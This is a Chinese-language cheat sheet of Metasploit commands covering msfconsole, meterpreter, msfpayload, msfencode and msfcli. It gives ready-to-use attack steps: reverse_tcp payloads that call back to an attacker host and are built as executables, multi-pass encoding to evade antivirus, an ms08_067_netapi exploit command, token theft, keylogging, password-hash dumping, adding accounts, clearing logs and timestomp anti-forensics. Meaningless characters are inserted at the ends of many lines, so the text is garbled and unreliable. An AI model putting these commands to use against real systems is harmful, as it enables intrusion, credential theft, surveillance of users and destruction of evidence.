Msfconsole:是一個一體化集中控制臺蕾殴,允許你訪問到幾乎所有的MSF框架選項
metasploit就是一個免費的漏洞框架,利用他人人都是黑客,使用者不需要任何編程基礎(chǔ)就可以使用
check:檢測漏洞是否存在
msf常用命令:
show exploits
列出metasploit框架中的所有滲透攻擊模塊。
show payloads
列出metasploit框架中的所有攻擊載荷被因。
show auxiliary
列出metasploit框架中的所有輔助攻擊載荷。
search name
查找metasploit框架中所有的滲透攻擊和其他模塊。
info
展示出制定滲透攻擊或模塊的相關(guān)信息梨与。
use name
裝載一個滲透攻擊或模塊堕花。
LHOST
你本地可以讓目標(biāo)主機(jī)連接的IP地址,通常當(dāng)目標(biāo)主機(jī)不在同一個局域網(wǎng)內(nèi)時蛋欣,就需要是一個公共IP地址航徙,特別為反彈式shell使用如贷。
RHOST
遠(yuǎn)程主機(jī)或是目標(biāo)主機(jī)陷虎。
set function
設(shè)置特定的配置參數(shù)(EG:設(shè)置本地或遠(yuǎn)程主機(jī)參數(shù))。
setg function
以全局方式設(shè)置特定的配置參數(shù)(EG:設(shè)置本地或遠(yuǎn)程主機(jī)參數(shù))杠袱。
show options
列出某個滲透攻擊或模塊中所有的配置參數(shù)尚猿。
show targets
列出滲透攻擊所有支持的目標(biāo)平臺。
set target num
指定你所知道的目標(biāo)的操作系統(tǒng)以及補丁版本類型楣富。
set payload name
指定想要使用的攻擊載荷凿掂。
show advanced
列出所有高級配置選項。
set autorunscript migrate -f.
在滲透攻擊完成后纹蝴,將自動遷移到另一個進(jìn)程庄萎。
check
檢測目標(biāo)是否選定滲透攻擊存在相應(yīng)的安全漏洞。
exploit
執(zhí)行滲透攻擊或模塊來攻擊目標(biāo)塘安。
exploit -j
在計劃任務(wù)下進(jìn)行滲透攻擊(攻擊將在后臺進(jìn)行)糠涛。
exploit -z
滲透攻擊完成后不與回話進(jìn)行交互。
exploit -e encoder
制定使用的攻擊載荷編碼方式(EG:exploit -e shikata_ga_nai)兼犯。
exploit -h
列出exploit命令的幫助信息忍捡。
sessions -l
列出可用的交互會話(在處理多個shell時使用)。
sessions -l -v
列出所有可用的交互會話以及詳細(xì)信息切黔,EG:攻擊系統(tǒng)時使用了哪個安全漏洞砸脊。
sessions -s script
在所有活躍的metasploit會話中運行一個特定的metasploit腳本。
sessions -K
殺死所有活躍的交互會話纬霞。
sessions -c cmd
在所有活躍的metasploit會話上執(zhí)行一個命令凌埂。
sessions -u sessionID
升級一個普通的win32 shell到metasploit shell。
db_create name
創(chuàng)建一個數(shù)據(jù)庫驅(qū)動攻擊所要使用的數(shù)據(jù)庫(EG:db_create autopwn)诗芜。
db_connect name
創(chuàng)建并連接一個數(shù)據(jù)庫驅(qū)動攻擊所要使用的數(shù)據(jù)庫(EG:db_connect user:passwd@ip/sqlname)瞳抓。
db_namp
利用nmap并把掃描數(shù)據(jù)存儲到數(shù)據(jù)庫中(支持普通的nmap語句,EG:-sT -v -P0)绢陌。
db_autopwn -h
展示出db_autopwn命令的幫助信息挨下。
db_autopwn -p -r -e
對所有發(fā)現(xiàn)的開放端口執(zhí)行db_autopwn,攻擊所有系統(tǒng)脐湾,并使用一個反彈式shell臭笆。
db_destroy
刪除當(dāng)前數(shù)據(jù)庫。
db_destroy user:passwd@host:port/database
使用高級選項來刪除數(shù)據(jù)庫。
***metasploit命令***
help
打開meterpreter使用幫助愁铺。
run scriptname
運行meterpreter腳本鹰霍,在scripts/meterpreter目錄下可查看到所有腳本名。
sysinfo
列出受控主機(jī)的系統(tǒng)信息茵乱。
ls
列出目標(biāo)主機(jī)的文件和文件夾信息茂洒。
use priv
加載特權(quán)提升擴(kuò)展模塊,來擴(kuò)展metasploit庫瓶竭。
ps
顯示所有運行的進(jìn)程以及相關(guān)聯(lián)的用戶賬戶督勺。
migrate PID
遷移到一個指定的進(jìn)程ID(PID號可通過ps命令從主機(jī)上獲得)。
use incognito
加載incognito功能(用來盜竊目標(biāo)主機(jī)的令牌或假冒用戶)
list_tokens -u
列出目標(biāo)主機(jī)用戶的可用令牌斤贰。
list_tokens -g
列出目標(biāo)主機(jī)用戶組的可用令牌智哀。
impersonate_token DOMAIN_NAME\\USERNAME
假冒目標(biāo)主機(jī)上的可用令牌。
steal_token PID
盜竊給定進(jìn)程的可用令牌并進(jìn)行令牌假冒荧恍。
drop_token
停止假冒當(dāng)前令牌瓷叫。
getsystem
通過各種攻擊向量來提升系統(tǒng)用戶權(quán)限。
execute -f cmd.exe -i
執(zhí)行cmd.exe命令并進(jìn)行交互送巡。
execute -f cmd.exe -i -t
以所有可用令牌來執(zhí)行cmd命令并隱藏該進(jìn)程摹菠。
rev2self
回到控制目標(biāo)主機(jī)的初始用戶賬戶下。
reg command
在目標(biāo)主機(jī)注冊表中進(jìn)行交互骗爆,創(chuàng)建次氨,刪除,查詢等操作淮腾。
setdesktop number
切換到另一個用戶界面(該功能基于那些用戶已登錄)糟需。
screenshot
對目標(biāo)主機(jī)的屏幕進(jìn)行截圖。
upload file
向目標(biāo)主機(jī)上傳文件谷朝。
download file
從目標(biāo)主機(jī)下載文件洲押。
keyscan_start
針對遠(yuǎn)程目標(biāo)主機(jī)開啟鍵盤記錄功能。
keyscan_dump
存儲目標(biāo)主機(jī)上捕獲的鍵盤記錄圆凰。
keyscan_stop
停止針對目標(biāo)主機(jī)的鍵盤記錄杈帐。
getprivs
盡可能多的獲取目標(biāo)主機(jī)上的特權(quán)。
uictl enable keyboard/mouse
接管目標(biāo)主機(jī)的鍵盤和鼠標(biāo)专钉。
background
將你當(dāng)前的metasploit shell轉(zhuǎn)為后臺執(zhí)行挑童。
hashdump
導(dǎo)出目標(biāo)主機(jī)中的口令哈希值。
use sniffer
加載嗅探模式跃须。
sniffer_interfaces
列出目標(biāo)主機(jī)所有開放的網(wǎng)絡(luò)端口站叼。
sniffer_dump interfaceID pcapname
在目標(biāo)主機(jī)上啟動嗅探。
sniffer_start interfaceID packet-buffer
在目標(biāo)主機(jī)上針對特定范圍的數(shù)據(jù)包緩沖區(qū)啟動嗅探菇民。
sniffer_stats interfaceID
獲取正在實施嗅探網(wǎng)絡(luò)接口的統(tǒng)計數(shù)據(jù)尽楔。
sniffer_stop interfaceID
停止嗅探投储。
add_user username password -h ip
在遠(yuǎn)程目標(biāo)主機(jī)上添加一個用戶。
clearev
清楚目標(biāo)主機(jī)上的日志記錄阔馋。
timestomp
修改文件屬性玛荞,例如修改文件的創(chuàng)建時間(反取證調(diào)查)。
reboot
重啟目標(biāo)主機(jī)呕寝。
***MSFpayload命令***
msfpayload -h
msfpayload的幫助信息勋眯。
msfpayload windows/meterpreter/bind_tcp O
列出所有windows/meterpreter/bind_tcp下可用的攻擊載荷的配置項(任何攻擊載荷都是可用配置的)。
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT X > payload.exe
創(chuàng)建一個metasploit的reverse_tcp攻擊載荷下梢,回連到LHOSTip的LPORT客蹋,將其保存為名為payload.exe的windows下可執(zhí)行程序。
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > payload.raw
創(chuàng)建一個metasploit的reverse_tcp攻擊載荷怔球,回連到LHOSTip的LPORT嚼酝,將其保存為名為payload.raw,該文件后面的msffencode中使用竟坛。
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT C > payload.c
創(chuàng)建一個metasploit的reverse_tcp攻擊載荷,導(dǎo)出C格式的shellcode钧舌。
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT J > payload.java
創(chuàng)建一個metasploit的reverse_tcp攻擊載荷担汤,導(dǎo)出成以%u編碼方式的javaScript語言字符串。
***msfencode命令***
mefencode -h
列出msfencode的幫助命令洼冻。
msfencode -l
列出所有可用的編碼器崭歧。
msfencode -t (c,elf,exe,java,is_le,js_be,perl,raw,ruby,vba,vbs,loop_vbs,asp,war,macho)
顯示編碼緩沖區(qū)的格式。
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
使用shikata_ga_nai編碼器對payload.raw文件進(jìn)行5編碼撞牢,然后導(dǎo)出一個名為encoded_payload.exe的文件率碾。
msfpayload windows/meterpreter/bind_tcp LPORT=PORT R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
創(chuàng)建一個經(jīng)過多種編碼格式嵌套編碼的攻擊載荷。
msfencode -i payload.raw BufferRegister=ESI -e x86/alpja_mixed -t c
創(chuàng)建一個純字母數(shù)字的shellcode屋彪,由ESI寄存器只想shellcode所宰,以C語言格式輸出。
***MSFcli命令***
msfcli | grep exploit
僅列出滲透攻擊模塊畜挥。
msfcli | grep exploit/windows
僅列出與windows相關(guān)的滲透攻擊模塊仔粥。
msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E
對IP發(fā)起ms08_067_netapi滲透攻擊,配置了bind_tcp攻擊載荷蟹但,并綁定在PORT端口進(jìn)行監(jiān)聽